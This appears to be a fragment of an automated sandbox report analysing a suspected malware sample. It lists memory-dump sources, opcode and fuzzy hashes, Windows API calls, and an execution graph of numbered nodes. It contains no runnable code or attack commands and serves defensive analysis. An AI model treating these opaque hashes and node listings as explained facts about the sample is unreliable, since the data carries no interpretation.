                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 410705778-0
                                                                                                                            • Opcode ID: 91d9201d7611c8f6d516cccd28c1d6359289609f6e04db88a37b8f770f7e9d62
                                                                                                                            • Instruction ID: ed4f745dada07ceefe7c8a74e0911d70a5a2c3e9dfce10af1bf461c609e3af93
                                                                                                                            • Opcode Fuzzy Hash: 91d9201d7611c8f6d516cccd28c1d6359289609f6e04db88a37b8f770f7e9d62
                                                                                                                            • Instruction Fuzzy Hash: 061125B5900349DFEB10DF9AD884BDEBFF8EB48314F10841AE558A7241C375A544CFA1
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 076FD12D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 410705778-0
                                                                                                                            • Opcode ID: 75624de7aab001636d7f8ea7ee4641ca21538ea70eebb602dca13cd87d7e2bd5
                                                                                                                            • Instruction ID: e15efff0b7c8a92f2eedfde12316b163cbfb5aaf1c9db20f388426542af9dcab
                                                                                                                            • Opcode Fuzzy Hash: 75624de7aab001636d7f8ea7ee4641ca21538ea70eebb602dca13cd87d7e2bd5
                                                                                                                            • Instruction Fuzzy Hash: 271103B5900749DFDB20DF9AD845BDEBBF8EB49310F10841AE919A7340C375A944CFA5
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0153B29E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: c89e3b94c7990af0ae136dccbc4b9314c8d32cfcc5c0ecf4dce6de7b968d41de
                                                                                                                            • Instruction ID: 6764aab4b8d165c32cc527eaa5e4195f24e505b203ae412e4f339c1e725a1dd7
                                                                                                                            • Opcode Fuzzy Hash: c89e3b94c7990af0ae136dccbc4b9314c8d32cfcc5c0ecf4dce6de7b968d41de
                                                                                                                            • Instruction Fuzzy Hash: 071110B6C003498FEB20CF9AC444BDEFBF4EB88310F10851AD828AB200C379A545CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1304299465.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_14dd000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8568ca5a7bf7e195e12216208d4eb954a86ca837ff60394b2e29bbfd20fde4b8
                                                                                                                            • Instruction ID: 40330145f3749408cd14b0141efb305e47a7ab7f98002eb4cd4867e8e37dd789
                                                                                                                            • Opcode Fuzzy Hash: 8568ca5a7bf7e195e12216208d4eb954a86ca837ff60394b2e29bbfd20fde4b8
                                                                                                                            • Instruction Fuzzy Hash: B121F472900204EFDF15DF54D9C0B66BB65FB84324F20C57EE9090B2A6C336E456CAA2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1304524360.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_14ed000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b89c64a0f467d7e8f659aefb9b0620506b073f614d4325916ae49789fc9d8639
                                                                                                                            • Instruction ID: ba01def87cd46a8dc2e0a159b2fca43eb1da5a80629ef9637ff396f9a760c628
                                                                                                                            • Opcode Fuzzy Hash: b89c64a0f467d7e8f659aefb9b0620506b073f614d4325916ae49789fc9d8639
                                                                                                                            • Instruction Fuzzy Hash: E82106B1904200DFDB15DF54D588B16BFA1FB84319F28C56ED90A0B3A6C336D407CA61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1304524360.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_14ed000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0c031c2bc2e19aad99b5e5ba7a3216e04bcc6c3bd9cecbfb9b6746684a08db50
                                                                                                                            • Instruction ID: 4fde3ea853603c4720e0404c21645b9cb82d34415d1bc15d5f228c290b165bf7
                                                                                                                            • Opcode Fuzzy Hash: 0c031c2bc2e19aad99b5e5ba7a3216e04bcc6c3bd9cecbfb9b6746684a08db50
                                                                                                                            • Instruction Fuzzy Hash: B521F575D04200EFDB15DFA4D9C8B26BBA5FB84325F20C56EE9494F3A2C336D446CA62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1304524360.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_14ed000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b917d1456fd132d673e557b93206d98c8e36cb0768cdf227ebe639e198f4b415
                                                                                                                            • Instruction ID: 8e55c36753d201a92b7fea55bed99c6d02895c0e9e7cdf676bd552c137a109d8
                                                                                                                            • Opcode Fuzzy Hash: b917d1456fd132d673e557b93206d98c8e36cb0768cdf227ebe639e198f4b415
                                                                                                                            • Instruction Fuzzy Hash: 4121B3755093808FCB02CF24D594712BFB1EF46214F28C5DBD8498F6A3C33A980ACB62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1304299465.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_14dd000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                                                                            • Instruction ID: a5815d12db6f8e172e6a993b61caaefbb53b0d60aee79770efb3a4a373769491
                                                                                                                            • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                                                                            • Instruction Fuzzy Hash: 5511C072804240DFDF16CF44D5C0B56BF61FB84324F2486AAD9090B6A7C33AE456CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1304524360.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_14ed000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                                                            • Instruction ID: 314b18b8386c16644256b9fb1baed49a13adf10d4129067ba12a2f1c093fdc7c
                                                                                                                            • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                                                            • Instruction Fuzzy Hash: D211BB75904280DFDB16CF54D6C4B16FFA1FB84324F24C6AAD8494B7A6C33AD40ACB62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$(oq$,q$,q$Hq
                                                                                                                            • API String ID: 0-962059274
                                                                                                                            • Opcode ID: 1359e32fdf311d4090fd8202ad79883332ecff30172a4e9f826bd169f9824835
                                                                                                                            • Instruction ID: 3af8d25f2af672f2f677417a591978113ee689333a1c80c1ad9b1f3914fd3456
                                                                                                                            • Opcode Fuzzy Hash: 1359e32fdf311d4090fd8202ad79883332ecff30172a4e9f826bd169f9824835
                                                                                                                            • Instruction Fuzzy Hash: 2A0263B5A00119DFDB55EFB9C494AAEBBB2BF85710B25815AE806DB370DB30EC41CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ug
                                                                                                                            • API String ID: 0-2775834119
                                                                                                                            • Opcode ID: c4cc1b1da7c99be42097ffd4179f793427de4605dd574cc7e22d603848ff54f8
                                                                                                                            • Instruction ID: 9dfe557c199563661ee695f626bb5cb53a35d26963043ed612bc071460d4cfa1
                                                                                                                            • Opcode Fuzzy Hash: c4cc1b1da7c99be42097ffd4179f793427de4605dd574cc7e22d603848ff54f8
                                                                                                                            • Instruction Fuzzy Hash: B5E10BB4E002198FDB14DFA9C590AAEFBB2FF49305F248169D915AB359D7309942CFA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'q
                                                                                                                            • API String ID: 0-1807707664
                                                                                                                            • Opcode ID: 26f8152f8853799bbb2831c82ef4982ce8ee17d761cd1ac9f0d58113915d748f
                                                                                                                            • Instruction ID: 09a4999b6c8d7a42952a4ab607e9dce09ed8813fe8e60d0799b3b1a360ca720b
                                                                                                                            • Opcode Fuzzy Hash: 26f8152f8853799bbb2831c82ef4982ce8ee17d761cd1ac9f0d58113915d748f
                                                                                                                            • Instruction Fuzzy Hash: 2E61D1B0E112099FE748EF7AE45169D7BF3FB88200F14D52AD008AF369EB70554ADB51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'q
                                                                                                                            • API String ID: 0-1807707664
                                                                                                                            • Opcode ID: c1eefcd1ae9b6662b0f7b49067ac3ef4eca2883fdb808fc9ecf3a727a274a3e1
                                                                                                                            • Instruction ID: 26cdaa9a9e3648bc49344afbf358bdc2cf62769bfac9e153ce910794d2d3fd41
                                                                                                                            • Opcode Fuzzy Hash: c1eefcd1ae9b6662b0f7b49067ac3ef4eca2883fdb808fc9ecf3a727a274a3e1
                                                                                                                            • Instruction Fuzzy Hash: 8361E2B0E112098FEB48EF7AE45169D7BF3FB88200F14D52AD004AF369EB70544ADB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ecc82c0a812a0e090f4caffa095847682a15ea2525f93009a9a19c017a68aaa6
                                                                                                                            • Instruction ID: 6e61fd9097e5b7e752594ea50cbaa456458def9621e39c6f4005680b6ef79572
                                                                                                                            • Opcode Fuzzy Hash: ecc82c0a812a0e090f4caffa095847682a15ea2525f93009a9a19c017a68aaa6
                                                                                                                            • Instruction Fuzzy Hash: 78D16FB1A00216CFCB14CF69C5846ADBBF2FF89315F6481A9D51AAB356D731DC42CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3a0673b7279e8d52eec3f666fe1d815e97728b84567d7c41ebab5897cf796529
                                                                                                                            • Instruction ID: 86f1f61235ea9a03099fe8166ce0b8733cfdcbf2f0ed3715696538caa0818f7f
                                                                                                                            • Opcode Fuzzy Hash: 3a0673b7279e8d52eec3f666fe1d815e97728b84567d7c41ebab5897cf796529
                                                                                                                            • Instruction Fuzzy Hash: 92E10DB4E0025A8FDB14DFA8C590AAEFBF2BF49304F248199D515AB359D730A942CF61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d6fdc3dc4ee6ac833f71b75cd784d839f7ef04c43f717561c46f341aa88c156f
                                                                                                                            • Instruction ID: a13c31f0ff19a55dd4d1e3f7b5d5cf2a1144dbe4dfe3afc01e3bf4d9fac128b3
                                                                                                                            • Opcode Fuzzy Hash: d6fdc3dc4ee6ac833f71b75cd784d839f7ef04c43f717561c46f341aa88c156f
                                                                                                                            • Instruction Fuzzy Hash: 2DE12FB4E0021A8FDB14DFA8C5909AEFBF2FF49305F248199D515AB355D730A942CFA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ea164c2169ab0a57a9bb5b494080ed069bd86ef86e9cab5a078c8ad146f9ae07
                                                                                                                            • Instruction ID: d1f51da433954e1df889bc6213fe7b3f044bfc13b7e021ee3d348b4a2c6d7e81
                                                                                                                            • Opcode Fuzzy Hash: ea164c2169ab0a57a9bb5b494080ed069bd86ef86e9cab5a078c8ad146f9ae07
                                                                                                                            • Instruction Fuzzy Hash: 57E13FB4E002198FDB14DFA9C580AAEFBF2FF49305F248159D515AB359C730A942CFA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 07d1495ea4f24691d93d991df56e8dd33b3c1d71ddcbbfd75c287c39fae4f8fb
                                                                                                                            • Instruction ID: fc0a4eafc378b622a71aa6176b2102abf79cf12b963c22da904aa9754c9f3294
                                                                                                                            • Opcode Fuzzy Hash: 07d1495ea4f24691d93d991df56e8dd33b3c1d71ddcbbfd75c287c39fae4f8fb
                                                                                                                            • Instruction Fuzzy Hash: F2E12CB4E002598FDB14DFA8C580AAEFBF2FF49304F248169D915AB359D731A942CF60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f3b16fd9cd92db82f72a8f9b866f4da7e268f3d5ba1eac6e9300b8475ddaad79
                                                                                                                            • Instruction ID: 5b2031b7d645ac0b46434d53eda478163aed742b6826f168024484524fa822d6
                                                                                                                            • Opcode Fuzzy Hash: f3b16fd9cd92db82f72a8f9b866f4da7e268f3d5ba1eac6e9300b8475ddaad79
                                                                                                                            • Instruction Fuzzy Hash: 71A18D32E0021A8FCF15DFB4C88499EBBB2FFD4300B15456AE905AF265DB71E916DB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8984ef3826679e47593093975f2a02b38c6e2dfd8238b0ad243a415b9d954ff9
                                                                                                                            • Instruction ID: 64658efdf79c06c91afa566fff55dbada2c3e4f67f39dd49af428f7a643c3806
                                                                                                                            • Opcode Fuzzy Hash: 8984ef3826679e47593093975f2a02b38c6e2dfd8238b0ad243a415b9d954ff9
                                                                                                                            • Instruction Fuzzy Hash: 0B71F4B0D0522DCFDB54EFE9D444AEEBBB6EF8A300F24912AD809A7255DB345946CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c4a60671c1af97214c99437040f15f107499289fd1c5b5d463e6ca0e53010fcf
                                                                                                                            • Instruction ID: ca49c23dcd8d5d40a171f162352e704ac8e5e788cd95727c8776bcdfedb812cd
                                                                                                                            • Opcode Fuzzy Hash: c4a60671c1af97214c99437040f15f107499289fd1c5b5d463e6ca0e53010fcf
                                                                                                                            • Instruction Fuzzy Hash: 1D515EB1E042198FDB14CFA9C5805AEFBF2FF89304F24816AD519AB315D731A942CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 29819251c6d5178046921709c546a69b92ff6766cefc255b15b9ef4d036dacec
                                                                                                                            • Instruction ID: b7e0885269142f77fe95ad8ded12937c27ad8d1510652709273cdff2cf743e4d
                                                                                                                            • Opcode Fuzzy Hash: 29819251c6d5178046921709c546a69b92ff6766cefc255b15b9ef4d036dacec
                                                                                                                            • Instruction Fuzzy Hash: B1E0C9B895A10CCFCB10CF94E8452F8B778AB4B311F006096D60FA2621E730598ACE61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 29c8ec9541a183392714b5719f284646bfccad8e97a9fc080acbdeed28c4a455
                                                                                                                            • Instruction ID: 8a0c4ef52c53d6d25bbddc44773b7671097dfa289463f23ee169ef0f1e2eac71
                                                                                                                            • Opcode Fuzzy Hash: 29c8ec9541a183392714b5719f284646bfccad8e97a9fc080acbdeed28c4a455
                                                                                                                            • Instruction Fuzzy Hash: 52E092B895A108CBCB108F94E8455F8B7B8AB4B311F0070A6DA0EA7621E730595ACA65

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:14.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:2.1%
                                                                                                                            Total number of Nodes:189
                                                                                                                            Total number of Limit Nodes:12
                                                                                                                            execution_graph 30315 119c238 30316 119c540 30315->30316 30317 119c260 30315->30317 30318 119c269 30317->30318 30321 119b704 30317->30321 30320 119c28c 30322 119b70f 30321->30322 30323 119c583 30322->30323 30325 119b720 30322->30325 30323->30320 30326 119c5b8 OleInitialize 30325->30326 30327 119c61c 30326->30327 30327->30323 30460 1195488 30461 119548e 30460->30461 30463 11954c5 30461->30463 30468 1195700 30461->30468 30472 11956f0 30461->30472 30462 1195505 30476 11969f0 30462->30476 30488 1196a00 30462->30488 30500 1195750 30468->30500 30510 1195740 30468->30510 30469 119570a 30469->30462 30473 119570a 30472->30473 30474 1195750 2 API calls 30472->30474 30475 1195740 2 API calls 30472->30475 30473->30462 30474->30473 30475->30473 30477 1196a00 30476->30477 30478 1194ce4 GetModuleHandleW 30477->30478 30479 1196a92 30478->30479 30485 1194ce4 GetModuleHandleW 30479->30485 30528 1196eb1 30479->30528 30480 1196aae 30481 1196ada 30480->30481 30482 1194c14 GetModuleHandleW 30480->30482 30481->30481 30483 1196b1e 30482->30483 30532 11978e0 30483->30532 30535 1197870 30483->30535 30485->30480 30489 1196a06 30488->30489 30490 1194ce4 GetModuleHandleW 30489->30490 30491 1196a92 30490->30491 30498 1196eb1 GetModuleHandleW 30491->30498 30499 1194ce4 GetModuleHandleW 30491->30499 30492 1196aae 30493 1194c14 GetModuleHandleW 30492->30493 30495 1196ada 30492->30495 30494 1196b1e 30493->30494 30496 1197870 CreateWindowExW 30494->30496 30497 11978e0 CreateWindowExW 30494->30497 30496->30495 30497->30495 30498->30492 30499->30492 30501 1195761 30500->30501 30504 1195784 30500->30504 30502 1194c14 GetModuleHandleW 30501->30502 30503 119576c 30502->30503 30503->30504 30520 11959e8 30503->30520 30524 11959d8 30503->30524 30504->30469 30505 1195988 GetModuleHandleW 30507 11959b5 30505->30507 30506 119577c 30506->30504 30506->30505 30507->30469 30511 1195750 30510->30511 30512 1194c14 GetModuleHandleW 30511->30512 30514 1195784 30511->30514 30513 119576c 30512->30513 30513->30514 30518 11959d8 GetModuleHandleW 30513->30518 30519 11959e8 GetModuleHandleW 30513->30519 30514->30469 30515 1195988 GetModuleHandleW 30517 11959b5 30515->30517 30516 119577c 30516->30514 30516->30515 30517->30469 30518->30516 30519->30516 30521 11959ee 30520->30521 30522 1194c14 GetModuleHandleW 30521->30522 30523 11959fc 30522->30523 30523->30506 30525 11959e8 30524->30525 30526 1194c14 GetModuleHandleW 30525->30526 30527 11959fc 30526->30527 30527->30506 30529 1196ec0 30528->30529 30530 1196ecb 30529->30530 30531 11970c1 GetModuleHandleW 30529->30531 30530->30480 30531->30530 30541 1194dcc 30532->30541 30536 1197880 30535->30536 30538 1197886 30535->30538 30536->30481 30537 11978a0 30537->30481 30538->30537 30539 1194dcc CreateWindowExW 30538->30539 30540 1197915 30539->30540 30540->30481 30542 1197930 CreateWindowExW 30541->30542 30544 1197a54 30542->30544 30328 14dd044 30329 14dd05c 30328->30329 30330 14dd0b6 30329->30330 30337 1197ad7 30329->30337 30343 1194de4 30329->30343 30347 1194df4 30329->30347 30355 119883c 30329->30355 30365 1197ae8 30329->30365 30371 1197c19 30329->30371 30338 1197b0e 30337->30338 30339 1194de4 GetModuleHandleW 30338->30339 30340 1197b1a 30339->30340 30341 1194df4 CallWindowProcW 30340->30341 30342 1197b2f 30341->30342 30342->30330 30344 1194def 30343->30344 30380 1194e1c 30344->30380 30346 1197c27 30346->30330 30350 1194dff 30347->30350 30348 11988a9 30352 11988a7 30348->30352 30414 1194f1c 30348->30414 30350->30348 30351 1198899 30350->30351 30404 11989d0 30351->30404 30409 11989c0 30351->30409 30356 11988a8 30355->30356 30357 1198842 30355->30357 30358 1194f1c CallWindowProcW 30356->30358 30359 11988a9 30357->30359 30362 1198899 30357->30362 30361 11988a7 30358->30361 30360 1194f1c CallWindowProcW 30359->30360 30359->30361 30360->30361 30363 11989d0 CallWindowProcW 30362->30363 30364 11989c0 CallWindowProcW 30362->30364 30363->30361 30364->30361 30366 1197b0e 30365->30366 30367 1194de4 GetModuleHandleW 30366->30367 30368 1197b1a 30367->30368 30369 1194df4 CallWindowProcW 30368->30369 30370 1197b2f 30369->30370 30370->30330 30372 1197c20 30371->30372 30375 1197c26 30371->30375 30373 1194e1c GetModuleHandleW 30372->30373 30374 1197c27 30373->30374 30374->30330 30375->30330 30376 1194ce4 GetModuleHandleW 30375->30376 30377 1197c89 30376->30377 30378 1194c14 GetModuleHandleW 30377->30378 30379 1197cf8 30377->30379 30378->30379 30381 1194e27 30380->30381 30386 1194ce4 30381->30386 30385 1197cf8 30387 1194cef 30386->30387 30387->30387 30388 1196ecb 30387->30388 30394 11970c1 30387->30394 30388->30385 30390 1194c14 30388->30390 30391 1195940 GetModuleHandleW 30390->30391 30393 11959b5 30391->30393 30393->30385 30395 11970e5 30394->30395 30396 1194c14 GetModuleHandleW 30395->30396 30397 1197109 30395->30397 30396->30397 30398 1194c14 GetModuleHandleW 30397->30398 30399 11972c5 30397->30399 30400 119724b 30398->30400 30399->30388 30400->30399 30401 1194c14 GetModuleHandleW 30400->30401 30402 1197299 30401->30402 30402->30399 30403 1194c14 GetModuleHandleW 30402->30403 30403->30399 30405 11989e4 30404->30405 30418 1198a79 30405->30418 30421 1198a88 30405->30421 30406 1198a70 30406->30352 30411 11989d0 30409->30411 30410 1198a70 30410->30352 30412 1198a79 CallWindowProcW 30411->30412 30413 1198a88 CallWindowProcW 30411->30413 30412->30410 30413->30410 30415 1194f27 30414->30415 30416 119a10a CallWindowProcW 30415->30416 30417 119a0b9 30415->30417 30416->30417 30417->30352 30419 1198a99 30418->30419 30424 119a04f 30418->30424 30419->30406 30422 1198a99 30421->30422 30423 119a04f CallWindowProcW 30421->30423 30422->30406 30423->30422 30425 1194f1c CallWindowProcW 30424->30425 30426 119a05a 30425->30426 30426->30419 30427 174e018 30428 174e024 30427->30428 30434 6cc2968 30428->30434 30430 174e61f 30435 6cc298a 30434->30435 30436 174e0c3 30435->30436 30448 6cc992c 30435->30448 30452 6cc953b 30435->30452 30456 6cc9548 30435->30456 30440 6ccfc5f 30436->30440 30444 6ccfc68 30436->30444 30441 6ccfc68 30440->30441 30442 6cc9548 LdrInitializeThunk 30441->30442 30443 6ccfd3a 30441->30443 30442->30443 30443->30430 30445 6ccfc8a 30444->30445 30446 6cc9548 LdrInitializeThunk 30445->30446 30447 6ccfd3a 30445->30447 30446->30447 30447->30430 30449 6cc97e3 30448->30449 30450 6cc9a69 LdrInitializeThunk 30449->30450 30451 6cc9a81 30450->30451 30451->30436 30454 6cc9548 30452->30454 30453 6cc96d9 30453->30436 30454->30453 30455 6cc9a69 LdrInitializeThunk 30454->30455 30455->30453 30459 6cc9579 30456->30459 30457 6cc96d9 30457->30436 30458 6cc9a69 LdrInitializeThunk 30458->30457 30459->30457 30459->30458

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
